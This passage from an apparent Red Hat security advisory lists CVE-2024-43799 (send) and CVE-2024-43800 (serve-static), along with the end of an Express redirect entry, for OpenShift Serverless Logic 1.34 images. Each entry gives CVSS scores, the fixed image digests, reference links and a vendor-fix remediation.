"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", 